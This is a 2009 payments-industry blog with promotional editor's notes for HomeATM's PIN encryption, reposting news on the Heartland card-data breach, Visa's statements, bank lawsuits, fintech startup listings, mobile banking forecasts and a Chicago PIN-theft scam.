Saturday, February 28, 2009

Hacked! Is Visa Next?

In an article scheduled for  next months Bank Technology News, Rebecca Sausner talks about the call and the need for systematic reform in the payments industry.  The main theme of the article is to adopt an End (Beginning) to End Encryption standard. 

One of the more eye-opening quotes comes from Avivah Litan, distinguished analyst from Gartner, who asks "How much worse can it get than a top 10 processor being breached? Visa's next."

Let me remind you Avivah Litan predicted that hackers would target the payment acquirers/processors months ago.  I believe it was shortly after the Hannaford breach. 

Now, with 3 processor/acquirer breaches in 3 months, it appears she's the Nostradamus of the financial transaction world.  So when one of her "quatrains" predict that "Visa's next"...I, for one, wouldn't write that off as being overly cautious (or pessimistic).  HomeATM CEO, Ken Mages, (who's also a "see-er) saw the same writing on the wall years ago.  Difference is, he's was in a position to, (and has already done) something about it.  Ms. Litan states that Visa needs to start seeing the same thing...or they're next. 

One of the reason's HomeATM employed End to End Encryption back in January 2007, is because Ken Mages understood that without beginning to end encryption, data is ripe for the picking. 

That's why HomeATM is the "only" (to our knowledge) processor who instantaneously encrypts the data at the point of sale (during the swipe) while it's inside our personal swiping device.  Amusingly, ironically and paradoxically, it's was his "outside the box" thinking that made him realize that encryption needs to be done "inside the box."

One of the biggest challenges HomeATM faces is overcoming the "hurdles" involved with trying to convince industry "insiders" that in order to truly secure a transaction, a hardware device is not optional,  it's necessary.  These latest breaches should make "overcoming those hurdles" a lot easier.  New Information always = New Decision(s).

One of the things we do have going for us in this "perfect storm," is that as unfortunate as these 3 processing/acquirer breaches in 3 months were, they are helping us in driving our message home. Articles like the one below don't hurt either.
These breaches should actually assist HomeATM in overcoming these hurdles... in fact, our technique(s) to securing transactions can hurdle HomeATM towards becoming an "Edwin Moses" like talent  

Speaking of Moses...they (the breaches) may even help part the read/see and get HomeATM to the promised land sooner. (Editor's Note: Edwin Moses overcame hurdles {for 122 straight wins} during a 9 year, 9 month and 9 day "run." 

I find it heartening that HomeATM's approach to securing/encrypting data for transaction's (since 1/2007) also involved a 9/9/9...99.9 Sigma. 

Like Edwin Moses, we WILL win. (with PIN)  The hackers don't hurt by "running" right through a processor's so-called security protocols.Here's an excerpt from the article:

Heartland's Lonely Quest For Reform
Bank Technology News | March 2009

By Rebecca Sausner

Heartland Payment Systems CEO Robert Carr has likened his company's massive data breach to the Tylenol moment when product contamination led to an overhaul in packaging safety. It's likely Carr has had a few Tylenol moments himself in the past couple of months as he dealt with perhaps the largest data breach ever, though the actual number of cards compromised is undisclosed.

Now Carr is using his standing in the industry - he founded Heartland and enjoys healthy respect among processors - to call for industry-wide reform of payments technology and information sharing about exploits to prevent criminals from successfully deploying the same hack on multiple targets.

Lots of industry players agree with his stance, but there's been scant input thus far from the industry's most influential parties: including titans such as MasterCard, Discover and Visa, which are mostly mum on the subject.

"Our concern is that an underlying principal of PCI compliance is that data can be held in its native form - unencrypted - as long as it is properly protected within a corporate firewall," says Bob Baldwin, CFO of Heartland.  Corporate firewalls are only as strong as their weakest link. "What we're trying to do in end-to-end encryption is have the data always remain in its encrypted form from the moment of the swipe to the moment it gets to the association."  (Editor's Note: that's going to be the biggest challenge as that will require the ecosystem of the payments landscape to be rebuilt)
It's easy to make a case that the Heartland breach should be a louder call for industrywide action than Hannaford or TJX.  The company is one of the leading processors, moving 11 million transactions each day, and was known to have invested heavily in its security. And, it had passed its latest PCI audit.

"I think it's more serious, how much worse can it get than a top 10 processor?" says Avivah Litan, Gartner vp. "Plus, it's a much bigger target. Visa's next."

Litan's in agreement with Carr that now's the time for the industry to pony up for end-to-end encryption. Some POS terminals can already encrypt data,

(Editor's Encryption Note 1
: Our PIN Entry Device was manufactured from "beginning to end" to do so)
processors can encrypt data while it's in their environment, (Editor's Encryption Note 2:  HomeATM not only "can" but DOES) and issuers could "theoretically" accept encrypted data and decrypt it in their environment.

Editor's Encryption Note 3:  That's the beauty of our PIN's not theoretical, it's reality.  PIN's remain encrypted all the way through the process...and not only is a KEY required by the processor to un-encrypt it, but HomeATM uses DUKPT (DuckPut)  which creates a "UNIQUE" key for every transaction.  In the extremely unlikely event "one key" is somehow obtained, only one transaction is put at risk because there's a new key for the next one.

For those interested, here's a quickie lesson.  Others, scroll down, my rant continues...

In cryptography, Derived Unique Key Per Transaction (DUKPT) is a key management scheme in which for every transaction, a unique key is used which is derivedfrom a fixed key. Therefore, if a derived key is compromised, futureand past transaction data are still protected since the next or priorkeys cannot be determined easily. DUKPT is specified in ANSI X9.24 part 1.

DUKPT allows the processing of the encryption to be moved away fromthe devices that hold the shared secret. The encryption is done with a derivedkey, which is not re-used after the transaction. DUKPT is used toencrypt electronic commerce transactions. While it can be used toprotect information between two companies or banks, it is typicallyused to encrypt PIN information acquired by Point-Of-Sale (POS) devices.

DUKPT is not itself an encryption standard; rather it is a key management technique. The features of the DUKPT scheme are:
  • enable both originating and receiving parties to be in agreement as to the key being used for a given transaction,
  • each transaction will have a distinct key from all other transactions, except by coincidence,
  • if a present key is compromised, past and future keys (and thus thetransactional data encrypted under them) remain uncompromised,
  • each device generates a different key sequence,
  • originators and receivers of encrypted messages do not have to perform an interactive key-agreement protocol beforehand.
The problem is without an agreed-upon standard - though triple DES would likely work - (Editor's Encryption Note 4:  HomeATM uses triple 3DES) there are "air gaps" between each of the players that even PCI doesn't address.

Still, it'd likely be worth the trouble.

Editor's Encryption Note 5:  It WAS worth the trouble, in fact that isn't what troubled us...what's  troubling is that it seems like it's taking forever getting other's (payment industry pro's) to understand what it written in this article...(maybe because it's written in "clear text.")

What we we need is an Edwin Moses approach to overcoming the hurdles involved with "parting that read/see" and getting industry insiders to "read" further into the risks mitigated by PIN and "see" what Avivah Litan see's...)

"I would say the cost of putting end-to-end encryption in place would be lower than the all the PCI security costs and the breaches," Litan says.

Editor's Encryption Note 6:  Ya think?  Now if we can only get "DUH!" so-called industry experts/insiders to see it that way...)  About the only thing HomeATM puts out there in "clear text" is that a "PIN Based 3DES DUKPT Encryption is the most secure way to process a transaction.  Beginning to End Encryption. 

Want to learn more about our Tales from Encrypt?  Contact us.
and we'll tell you all about it...from Beginning to End!

Continue Reading at Bank Technology News

Reblog this post [with Zemanta]

Visa: New Payment Processor Breach Not New

The new processor breach that has had everyone speculating over the past 2 weeks... is "not new" according to Visa. 

Everyone else's (100,000,000 plus cards) card information has not been kept a secret, yet the "identity" of the processor who let the hacking world into theirs HAS been.   Visa has already publicly stated that  this "new" breach was "unrelated to the Heartland breach," so that leaves only one processor in the running.  RBS Worldpay.  Developing...

Here's the story from

Visa: New payment-processor data breach not so new after all
February 27, 2009 (Computerworld) Days after Visa Inc. seemingly confirmed that a data breach had taken place at a third payment processor, following on the recent breach disclosures by Heartland Payment Systems Inc. and RBS WorldPay Inc., the credit card company is now saying that there was no new security incident after all.

In actuality, Visa said in a statement issued today, alerts that it recently sent to banks and credit unions warning them about a compromise at a payment processor were related to the ongoing investigation of a previously known breach. However, Visa still didn't disclose the identity of the breached company, nor did it say why it is continuing to keep the name under wraps.

Visa said that it had sent lists of credit and debit card numbers found to have been compromised to financial institutions "so they can take steps to protect consumers." The company added that it currently "is risk-scoring all transactions in real time, helping card issuers better distinguish fraudulent transactions from legitimate ones."

Visa's latest statement follows ones that both it and MasterCard International Inc. issued earlier this week in response to questions about breach notices that had been posted by several credit unions and banking associations. The notices made it clear that they weren't referring to the system intrusion disclosed by Heartland on Jan. 20 and suggested that a new breach had occurred.

Visa's initial statement and the one from MasterCard were both carefully worded; neither said specifically that the breach being referred to was a new one, but they also didn't say that it was a previously disclosed incident. Visa said it was "aware that a processor has experienced a compromise of payment card account information from its systems," while MasterCard said it had notified card issuers of a "potential security breach" affecting a payment processor in the U.S.

MasterCard officials didn't respond today to requests seeking clarification on whether its statement referred to a previous breach or a new one.

Benson Bolling, vice president of lending at the Alabama Credit Union in Tuscaloosa, said today that officials there had understood the breach to be a new one based on the alerts sent out by Visa — but couldn't say that for sure. According to Bolling, the credit union, which posted an advisory on Feb. 17 and updated it two days later, was informed by Visa of a "big breach" shortly after getting the word about the intrusion at Heartland.

The identifying number that was used in the so-called Compromised Account Management System alert issued by Visa appeared to suggest a new breach, because it was different from those used in previous CAMS notices, Bolling said. It was his understanding, he added, that CAMS alerts related to a previous breach would use the same identifier as the original notifications...

continue reading at

Friday, February 27, 2009

Finovate Startup09 Company Descriptions

Finovate Startup Conference Company Descriptions (NetBanker)
By Jim Bruene

To give you an idea of the types of innovations being funded in financial services these days, here's a capsule description of the first 48 companies demoing at FinovateStartup April 28 in San Francisco

Attention attendees: You have just one day left to register (here) at the discounted price of $795.

Finovate Startup 2009 Participants

Acculynk is a payments solutions provider with a suite of software-only services that secure online transactions by utilizing a graphical, scrambling PIN-pad for the secure entry of sensitive cardholder information.

AlphaClone is a web-based investment research service that lets users explore the investing ideas of top hedge fund and institutional money managers.

Aradiom is a mobile solutions provider and designer of Java mobile applications and platform development technology including turn-key applications, embedded soft-token security solutions and BlackBerry® enterprise applications.

BillShrink is a personalized savings advisor that helps consumers make smart, money-saving decisions by providing continuously updated, personalized, usage-based recommendations on everyday services like credit cards and cell phone plans

BudgetTracker is a personal finance manager that allows users to manage their finances and keep track of their budget, bills, and transactions online without having to install software.

CalendarBudget is a free online personal budgeting tool that helps users organize and track their finances, plan future spending and save money.

Centrro is a financial search engine that allows consumers to anonymously shop for personal financial products that best fit their specific credit profile.

CircleUp provides group communications services, which enable actionable and efficient interactions across diverse social, email, mobile, messaging and private web networks.

Cooler Inc.
Cooler Inc. enables users to know, decrease, and offset the global warming impact of their everyday purchases and activities by using the country's only peer-reviewed carbon calculator to calculate impact and then providing reductions targets and strategies, and offering recommendations on high quality carbon offsets.

CreditArray is a vault of proprietary information to allow consumers to better apply for and manage their credit portfolios.

Credit Karma
Credit Karma provides consumers free access to their credit score and offers credit simulators, advice, and credit score comparison tools in order to allow them to more actively manage their credit and financial health.

GoalSpring's product, DebtGoal, makes paying down debt as easy and efficient as possible by taking into account all of a customer's debt and helping them organize, optimize and pay it down.

Expensify simplifies keeping track of business expenses by combining an electronic payment card and a web-based expense manager to automate expense report preparation, approval, and reimbursement.

Green Sherpa
Green Sherpa offers personal cash flow management software that lets users conveniently download, manage and update all their financial accounts via a single online resource.

Home-Account is in stealth mode at this time.


HomeATM provides a secure PIN debit and PIN credit card transaction method via the Internet that utilizes the HomeATM swipe pad technology to allow users to conduct secure PIN-based transactions from home, ensuring virtually zero fraud and lower merchant processing fee costs.

iBearSoft is the creator of iBearMoney, a personal finance application for the iPhone that allows users to input and categorize their transactions, run financial reports, analyze payments, and keep track of expenses.

iThryv is a financial literacy platform that combines a content delivery system and an incentive system in order to create an immersive learning environment which provides a powerful tool when used in partnership with online banking and core providers.

Jwaala provides software for banks and credit unions that improves their online banking services. Their MoneyTracker application offers a personal financial management solution that can be added to any bank or credit union's existing online banking solution.

kaChing is a social investment community that applies an open source and social-networking strategy to offer every investor the opportunity to find outstanding investors, emulate their portfolios, and access the returns, insights, transparency and talent previously only available to wealthy individuals.

Kapitall is a rich web application that aims to make investing easy for everyone. Inspired by game design, Kapitall combines an graphical user interface with tools that make it easier than ever to research companies, build portfolios, share ideas and get smarter about the market.

Lending Club
Lending Club is an online social lending network where people can borrow and invest money at attractive rates.

LendingKarma is a person-to-person lending site that makes it easy for parties that know each other to create loans and provides borrowers and lenders with tools to help service the loan and see it through to repayment. enables people to manage their finances online using an open source financial platform that allows developers to build sophisticated applications which will help users enhance their experience and increase the efficiency of the service.

Mint is an online personal finance service that securely downloads users' financial transactions, allows them to categorize their transactions, provides a unified view of all account activity and relevant account alerts, and offers personalized suggestions for significant savings opportunities.

Moneta provides a secure, quick and easy form of online payment that directly debits users' checking or money market account allowing users to only enter a secure username and password when making online purchases.

NCore provides enterprise class delivery channel solutions to financial institutions within the Asia Pacific and Middle East regions fusing applications, innovative security and middleware technology into a single integrated platform.

OurCashFlow offers personal finance management tools for financial institutions that can turn their website into a place where customers can create a budget, save money and achieve their savings goals.

Pennyminder helps individuals and small groups manage their shared and personal finances by tracking deposits and withdrawals allowing them to see what's happening with their money

People Capital
People Capital is a peer-to-peer private student loan service that utilizes a unique scoring system to predict a student's potential and provide a true, unbiased measure of the economic value of an education that empowers students to make better educational decisions and offers multiple advantages for both borrowers and lenders.

Pertuity Direct
Pertuity Direct offers social lending for personal loans by bringing together the advantages of capital markets, social networks and traditional banking.

Portfolio Monkey
Portfolio Monkey provides free online portfolio management tools to help average investors optimize their portfolios and find customized investment ideas so they can create more efficient portfolios with higher expected return and less risk.

Prosper is a person-to-person lending marketplace where people list and bid on loans using Prosper's online auction platform.

The Receivables Exchange
The Receivables Exchange is a real-time online market for trading accounts receivable that gives businesses access to working capital at a competitive cost by connecting a global network of accredited investors to the nation's small and mid-sized businesses.

Rudder is a free personal finance software designed to minimize the effort required in managing money by helping users to manage their budget, track their bills and analyze their expected income and projected expenses.

Silver Tail Systems
Silver Tail Systems provides fraud prevention to defend users' websites against business logic abuse through the use of behavior detection, efficient investigation and real-time mitigation to track suspicious behavior and divert the bad actors, leaving legitimate users unaffected.

SimpliFi provides independent financial advice online. Users can complete a profile and receive a personal financial plan with specific actionable steps.

SmartHippo uses the power of the community to find users the best rates on financial products and services.

SmartyPig is a social saving service that helps users save for a specific goal by allowing them to invite others to contribute to their account, providing incentive boosts from top retailers, and offering a competitive interest rate.

moneyStrands is a money management service that helps users get information on anything from practical savings tips to getting help tracking expenses down

Syphr is a technology and marketing credit union service organization that created RateMatch, a service that matches participating credit unions with the thousands of credit report purchasers per month.

ThreatMetrix helps companies control online fraud and abuse in real time by profiling the device used in an online transaction so companies can determine whether the users are fraudsters or customers.

Transparent Financial Services
Transparent Financial Services is online comparison-shopping service for small businesses that uses technology to help users compare and purchase financial services like payroll processing, credit card processing and business loans.

Victrio offers a credit risk management system that uses voiceprint recognition technology to fight credit card fraud and identity theft.

Wesabe is an online personal finance management tool that provides members with information about where they spend and links them with a community dedicated to helping each other make smart financial decisions.

WeSeed seeks to demystify the stock market by helping real people share what they know and make smart investing decisions based on the collective wisdom of the community.

ZimpleMoney is a web-based financial services platform enabling people and organizations to manage and administer financial agreements including loans, leases, rentals, tithing, trusts and settlements.

Reblog this post [with Zemanta]

Visa Survey Reveals Many SME's Believe They Are too Small to Attract Fraudsters

Fraud Prevention Month activities highlight importance of data security for small businesses in Canada

TORONTO, Feb. 27 /CNW/ - A survey of Canadian small businesses released today by Visa reveals that 41 per cent of respondents believe that 'data thieves and hackers' are not interested in targeting their businesses because of their size.  

As part of its annual Fraud Prevention Month activities, Visa is hosting free fraud prevention seminars in Toronto, Ottawa, Winnipeg and Calgary that will emphasize the importance of data security for small businesses.

"Regardless of the size of the enterprise, it's important for business owners to appreciate the importance of data security and what steps they should take to protect their customers and business," says Gord Jamieson, Head of Payment System Risk, Visa Canada. "The information sessions will provide a great deal of information and an opportunity for small business owners and managers to ask questions."

The Ipsos Reid survey, which was commissioned by Visa Canada, surveyed 885 small business owners about their data storage and security practices.

39% of respondents describe securing customer information as a vital part of their business and 94% believe that securing data is important to their customers. Of the 60 per cent of respondents that do keep electronic files with customer information, 86 per cent noted that they either encrypt the data (8%), ensure that it is password protected (39%) or ensure that the information is both encrypted and password protected (39%).

While the majority of respondents claim to appreciate the importance of data security to their business and customers, more than half (52%) have never sought information about how to properly secure electronic information and 24 per cent do not know where to get information about how to better secure information for their business.

"Preventing fraud is a shared responsibility," says Jamieson. "By offering information to small businesses during Fraud Prevention Month, we can help them better protect themselves against data thieves."

The Visa Canada workshops will help educate small businesses about how to better protect themselves from fraudsters. Sessions will include information on how to properly process a credit card transaction, tips on how to protect credit card information and to ensure that their payment application is secure, chip and PIN technology, and an overview of the Visa Account

Information program. More information and free registration is available online at In addition, through its participation in the Fraud Prevention Forum, Visa works closely with government and law enforcement to provide educational materials to all Canadians to help them "recognize, report and stop" fraud. Educational materials for consumers and merchants on fraud prevention can be found on

About the Survey

The online survey was conducted between February 2 and 9, 2009, by Ipsos Reid. A total of 885 small and medium sized business owners who employ 1-250 employees and accept credit or debit cards were surveyed. An unweighted probability sample of this size, with 100 per cent response rate, would have an estimated margin of error of plus or minus 3.3 percentage points, 19 times out of 20. Margin of error for subgroups will be larger.

About Visa

Visa Inc. operates the world's largest retail electronic payments network providing processing services and payment product platforms. This includes consumer credit, debit, prepaid and commercial payments, which are offered
under the Visa, Visa Electron, Interlink and PLUS brands. Visa enjoys unsurpassed acceptance around the world, and Visa/PLUS is one of the world's largest global ATM networks, offering cash access in local currency in more
than 170 countries. For more information, visit

For further information: Sarah Van Lange, Fleishman Hillard, (416) 645-8173,; Carla Morin, Visa Canada, (416) 860-8850,

Source: VISA INC.

Reblog this post [with Zemanta]

Banks File Class Action Against Heartland

Bank Info Security, which has been covering the Heartland Breach better than most any other site I have found is now reporting that a class action lawsuit has been filed against the company on behalf of the banking institutions. 

Saw this coming from a mile away...(see: Banks Not HPY with Heartland)  This is just the beginning folks.  If I owned shares in Heartland, I wouldn't be HPY.

One lawsuit,the Lone Star National Bank is asking for $50 million in damages.  Damages will most likely be trebled.  This has got to be giving Heartland a bad ticker...speaking of which I haven't had an opportunity to check their stock price yet today...hold on..let me grab it for you...

In the meantime, you can click on the graphic to enlarge if you can't read it...

Here ya's a little off from it's 52 week high...yes?  Heartland says it will meritoriously defend itself against any lawsuit, which I take to mean that it will file a counter-suit against the brands (V/MC) claiming the breach was their fault because they don't provide end-to-end encryption. 

IMHO, if Visa and MasterCard would simply take the reduced Interchange Fees hit and get rid of (completely eliminate) signature debit...and completely replace it with the more secure PIN Debit debit platform, this dog wouldn't be barking. 

Here's the report from Bank Info Security:

Heartland Data Breach: Class Action Suit Filed on Behalf of Banking Institutions

Complaint Seeks to Recover Costs, Damages from Fraud
February 27, 2009 - Linda McGlasson, Managing Editor

One month after the Heartland Payment Systems (HPY)data breach was revealed, a Philadelphia law firm filed a class actionlawsuit against the processor on behalf of two banks and three creditunions. The complaint was filed by Chimicles & Tikellis in U.S. District Court in Trenton, NJ on February 20.  (Click the graphic below to enlarge and read the treble damages request)

The five institutions named in the complaint are AmalgamatedBank, New York, NY; Matadors Community Credit Union, Chatsworth, CA;GECU, El Paso, TX; MidFlorida Federal Credit Union, Lakeland, FL ;andFarmers State Bank, Marcus, IA. All the institutions say they have hadto re-issue "substantial" numbers of credit and debit cards because ofthe Heartland breach.

Joseph Sauder, the (soon to rich) attorney leading the case, says while onlyfive institutions were named in the complaint, "We talked with numerousbanks. These five were the ones we selected to present in thecomplaint."

Although no one has estimated officially how many institutions, cards and consumers might be affected by the breach, more than 500 institutions have stepped forward to tell Information Security Media Group that they have been impacted.

Chimicles & Tikellis also has a consumer class action lawsuit filed against Heartland, filed in the same U.S. District Court in Trenton on January 27.

Seeking to Recover Costs

In the new class action suit, Sauder says the institutions "seekto recover money for the cost of reissuing cards and also for thefraudulent activity that banks and credit unions are ultimatelyresponsible for as a result of this breach, among other things."

Heartland announced on January 20 that its computer systems hadbeen breached by outside hackers sometime in 2008. The processorhandled on average 100 million transactions per month for about 175,000merchants and retail establishments. Heartland only became aware of thebreach after it was notified by Visa and MasterCard of "patterns offraudulent credit card activity," the lawsuit states.

The breach compromised information including debit and creditcard numbers, expiration dates and internal bank codes. Many of theinstitutions that had cards compromised in the breach were forced tore-issue new credit and debit cards to their customers. "Given thelarge size of the data breach, the expenses associated with doing soare substantial," the complaint says, "and include costs for purchasingnew plastic debit and credit cards, postage and other mailing expenses,time spent by employees address this issue and harm to reputation andgoodwill."|

Many institutions have also reported incidents of fraud, thecomplaint states. It says Heartland's actions "constitute violations ofthe consumer protection statute of New Jersey," and amounts to a breachof implied contract, negligence, negligent misrepresentation, andcommon law negligence.

Sauder says he cannot estimate how soon the case may begin orhow long it may last. "It's hard to tell at this time, since the casewas just filed, as to what Heartland's position is going to be," hesays. He adds that more institutions are expected to join the classaction suit.

Other Suits

There are at least three consumer class action lawsuitsfiled against Heartland and three other lawsuits filed in other courtsby institutions seeking to recoup their losses and expenses related tothe breach:
  • The Lone Star National Bank, Pharr, TX has filed a lawsuit seeking $50 million in damages against Heartland. The Lone Star case was filed in Texas Southern District Court on February 16.

  • TriCentury Bank, Simpson, KS filed a lawsuit in New Jersey District Court on February 13 seeking a judgment against the payments processor for breach of contract.

  • Lone Summit Bank, Lake Lotawana, MO filed a lawsuit in the Fraud or Truth-In-Lending office of the New Jersey District Court on February 6.

The lawsuits against Heartland aren't the only issues the paymentsprocessor is confronting. During a conference call reportingHeartland's 2008 fourth quarter earnings on February 24, HeartlandPresident and CFO Bob Baldwin said, "Today, we have had severallawsuits filed against us and we expect that additional lawsuits willbe filed. We are also the subject to several governmentalinvestigations and enquiry, including an informal enquiry by the SECand a related investigation by the Department of Justice, an inquiry bythe OCC, and an inquiry by the FTC, and we may, in the future, besubject to other governmental enquiries and investigation."

Reblog this post [with Zemanta]

Experts Publish 20 Guidelines to Halt Data Breaches

NOTICE to readers of this draft document: Criticisms and suggestionsare strongly encouraged. If you are actively engaged in cyberforensics, red teams, blue teams, technical incident response,vulnerability research, or cyber attack research or operations, pleasehelp make sure this document is as good as it can be. Sendcriticism/comments/sugges tions to John Gilligan as well as to byMarch 25, 2009Twenty Most Important Controls and Metrics for Effective Cyber Defense and Continuous FISMA Compliance


    Publish at Scribd or explore others:            Academic Work                  cyberdefense              fisma          

Reblog this post [with Zemanta]

Mobile Banking to Top $5.5 Billion in 2013

By Jason Ankeny

Consumers will conduct almost 300 billion mobile payment and banking transactions worth more than $860 billion in 2013, a twelve-fold increase in gross global transaction values in five years, according to a new forecast published by market research firm Informa Telecoms & Media. Informa contends that if key players collaborate effectively, the mobile payments and banking market offers a shared annual revenue opportunity of more than $10 billion in 2013, galvanized by m-banking services, which are expected to contribute $5.5 billion of that amount. Informa predicts that in four years' time, more than 445 million mobile subscribers worldwide will regularly use their mobile phone to purchase physical goods and services remotely--the report estimates that while the value of mobile payments and transactions in 2008 totaled around $71 billion, a third of which was spent on mobile digital content like ringtones, games and full-track downloads, physical goods and services will represent about 95 percent of mobile transactions by 2013.

Informa forecasts there will be 977 million worldwide users of mobile banking services by 2013, up from about 67 million at the end of 2008. In addition, almost 424 million consumers will transmit more than $157 billion of personal funds via mobile domestically by 2013, with another 73 million sending $48 billion internationally. However, Informa anticipates near-field communications payment models will be held back by the lack of availability of NFC-enabled handsets and related uncertainties concerning the overall business case for mobile NFC. Even so, Informa believes approximately 11 percent of all mobile handsets shipped in 2013 will be NFC enabled, with more than 178 million mobile subscribers regularly using mobile NFC phones to acquire physical goods and services, such as tickets, at the point of sale.

Informa credits the growth of mobile payments to drivers and enablers including more sophisticated handsets and network technologies, a more enlightened regulatory perspective on mobile banking, consumer familiarity and increased investment across the ecosystem. The report concedes that uncertainties remain, in particular the global financial meltdown as well as a crisis in consumer confidence triggered by widespread turmoil throughout the banking industry.

For more on the Informa forecast: read this release

Related articles:
Bill Gates pledges $12.5 million for mobile banking
MMA publishes Mobile Banking Overview
Reblog this post [with Zemanta]

Whitepaper - Mobile Banking in the United States

Blackberry Whitepaper: Mobile Banking in the United States – The Evolution of Anywhere Banking
Technological, economic and market factors have enabled a new breed of customers. Find out how the banking industry can leverage this new channel.

* Download Now (PDF) only see their conclusion, click the image below and it will enlarge enough to read

Reblog this post [with Zemanta]

Moneris Awards Verifone $10M EMV Terminal Contract


Bank-backed Canadian card payments processor Moneris is gearing up for the country's migration to EMV by awarding eftpos vendor Verifone a $10 million contract for the supply of terminals.

More on this story:

Pago Retail Report 2008 Press Release

(In Europe) Credit card increases lead over other payment methods in online retailing

Latest Pago Retail Report by Deutsche Card Services shows significant differences in payment behaviour between online retailing and e-commerce as a whole

COLOGNE, 27 February 2009 - As in overall e-commerce, credit cards are clearly the preferred payment method in European retailing. Their share rose almost 6 pp year-on-year, to now 81.57%. In other words: Consumers use credit cards to pay for more than eight out of ten purchases in European online retailing. This is one of the results explained in the Pago Retail Report 2008, which was recently published by Deutsche Card Services, a subsidiary of Deutsche Bank

(Editor's Note: These numbers are skewed because PIN Debit is not ubiquitous on the web.  For "across the board" numbers, visit "Debit is King, Cash Overthrone")

Offline payment methods and direct debiting lose importance in favour of credit cards

Despite the predominance of credit cards offline payment methods such as invoice purchases, COD and prepayment as well as direct debiting still play a more important role in online retailing than in overall e-commerce (payment behaviour in overall e-commerce is described in detail in the Pago Report 2008).

Just like the sector-specific Pago Retail Report 2008, the Pago Report 2008 is based on real-life transactions, not on surveys. That is what makes the Pago Reports different from other e-commerce studies. The report highlights that 5.04% of all retail transactions were paid for by offline methods and 11.97% by direct debiting.

The shares of these payment methods in overall e-commerce are only 0.77% and 8.34%, respectively. However, offline payment and direct debiting lose ground to credit cards in online retailing; in fact, the latter increased their lead, largely due to the success of Visa, whose share rose by more than 4%, whereas competing credit card brand MasterCard lost more than 2%.

Consumers from the UK and from outside Europe pay almost exclusively by credit card

The predominance of credit cards as most important payment method in retailing is even more visible among consumers from the UK and outside Europe than among German customers. Traditional payment methods such as invoice purchasing or direct debiting are almost non-existent for this consumer group. UK consumers use their credit cards even more often in retailing than in overall e-commerce. The share in overall e-commerce is already very high, at 91.50%, and it rises to 94.90% in retailing. Maestro, the leading international debit payment method, which is gaining ground in e-commerce in comparison to credit cards, is the only other payment method which seems acceptable to British consumers, with a share of 5.10%. Shops which also target customers outside Europe do well to offer credit card payment, which has a share of almost 100% among these consumers.Upward potential for new payment methods Maestro and giropay in European retailingIn general, retail consumers are still reluctant to adopt newer payment methods such as Maestro and giropay (which is based on the well-established PIN/TAN electronic banking method) - at least more reluctant than e-commerce customers as a whole. giropay meets with even less approval than Maestro. Maestro has a share of 0.77%, but giropay undershoots even this low mark with a share of only 0.65%. This is probably due to the fact that, using this new payment method, it is still difficult to process retail good returns and the crediting procedure for returned purchases is complicated.

Visa increases its lead over MasterCard as top credit card brand

Visa, which is the leading credit card brand in overall e-commerce, was able to confirm and even improve its leadership position in retailing, too. While the gap between Visa and MasterCard was just above 19pp in the preceding year, it is now more than 25pp. Visa has increased its lead again at the expense of the other credit card brands, whose share dropped from 7.35% to 5.48%. In the meantime Visa has overtaken its rival MasterCard in retailing with German consumers, too: While MasterCard was ahead of Visa in the preceding year with a share of 41.69% (vs 33.95%), Visa is now in front of MasterCard (44.40% vs 35.40%). In other consumer countries such as the UK, where the lead is an impressive 36.20 pp, Visa is even more predominant than in Germany.

Source: Press Release

Reblog this post [with Zemanta]

Visa in one Helluva SMS

HOLLYWOOD, Fla., Feb. 26 /PRNewswire/ --

Charge Notification Services Corporation (C.N.S.C.) has filed a lawsuit against VISA, Inc. for patent infringement. C.N.S.C. is a relatively young company in Miami, Florida, that offers information processing services to credit card issuing banks. The C.N.S.C. patent covers charge card transaction authorization and/or notification in real-time via SMS to the cardholder's cellular phone. VISA and some of their bank partners have recently been offering this service.

"We are very sorry that it had to come to filing this suit," says Ivan Ochoa, the C.E.O. of C.N.S.C. "For months we've tried exhaustively to work with VISA with no results. We're a young company but we have experience with this product and the credit card business as a whole. We have the knowledge and infrastructure to handle even the most extreme transaction volume. We've expended considerable resources on patent registration and product development."

Editor's note:  Apparently Visa didn't get the SMSage

Daniel Davila, COO of C.N.S.C., adds: "In these economically troubled times people want to use their cards (debit, pre-paid, credit card and charge) and receive real-time information about charges to their account. If cardholders have to wait until they receive their statement to discover possible merchant errors or duplications, it's already too late to avoid the complex and time-consuming process of 'charge-back' that costs cardholders and businesses time, resources and aggravation. Of course what cardholders want most of all is to be confident that their card account will not be used fraudulently. All indicators show that card fraud activity is expected to increase even further. We have the line of products that will significantly decrease card fraud and give confidence to all cardholders that in the event their card or account information is ever stolen and used fraudulently our SMS service will send them notification within a matter of seconds from the moment it occurs. We are in the business of stopping the fraudsters and providing tremendous savings and other benefits to our card issuing clients. As VISA continues to infringe on our patent, we really must take this legal action against them to protect our business. In the meantime, of course, we continue to actively offer our services to all card issuing financial institutions."

Ochoa and Davila have a combined five decades of experience in the financial services industry. Mr. Davila's background includes 16 years at American Express where he was a Senior Director within the Global Network Services (GNS/Franchise) division and more recently, two years as Vice President and Chief Risk Officer of the credit card division at Russian Standard Bank (RSB) in Moscow. While at RSB, Mr. Davila launched a similar SMS credit card fraud protection service with great success, resulting in an overall significant reduction of fraudulent transactions. Mr. Ochoa's 25 years in the financial services industry include executive positions within American Express and MasterCard International, where he was Chief of Staff for Latin American countries. His areas of expertise include managing operations for multi-markets, re-engineering, quality control and technology. Mr. Ochoa has lead major innovative developments in products and systems.
SOURCE Charge Notification Services Corporation

Thursday, February 26, 2009

Jewel Thieves

How To Steal a PIN

Chicago Sun Times

Two women police say were accomplices in a scam were arrested early Wednesday for allegedly stealing cash using a debit card PIN number in the self-checkout lines of a Near North Side Jewel grocery.

Belmont Area detectives issued a community alert Wednesday after a man met two women outside a River North bar last month and later discovered his bank debit card was missing and $8,600 was withdrawn from his account.

Neither of the women in custody, both 23, are believed to have been involved in the other incident.

The accomplices were spotted using an allegedly stolen credit card in the self-check out lanes and, using its PIN number, swiped it several times, each time asking $100 cash back for a small purchase like gum or soda.

In the alert, Belmont Area detectives said there have been numerous similar incidents downtown and on the Near North Side, where men have been approached by women "offering a ride or a good time."

The women convince the victims to withdraw cash from an ATM, and as he does so, they watch him enter his PIN. The women later take his credit/debit card without his knowledge and use it at self-checkout lanes at the Jewel groceries at 1224 S. Wabash Ave., 1210 N. Clark St. and Ohio and State.

In last month's incident, after the women got the man's card, they purchased a low-priced item at the South Wabash Jewel then depleted the man's bank account by $8,600 by withdrawing cash in $100 increments, the alert said. The women were seen by a witness driving away in a white Lincoln Continental.

Police advise men to be alert to suspicious people extending invitations to "go for a ride" or who offer a "good time." Additionally, police advise against carrying an excessive amount of cash and/or credit cards.

“It’s the perfect crime,’’ according to a police authority, who said the crimes are hard to prosecute for at least two reasons.

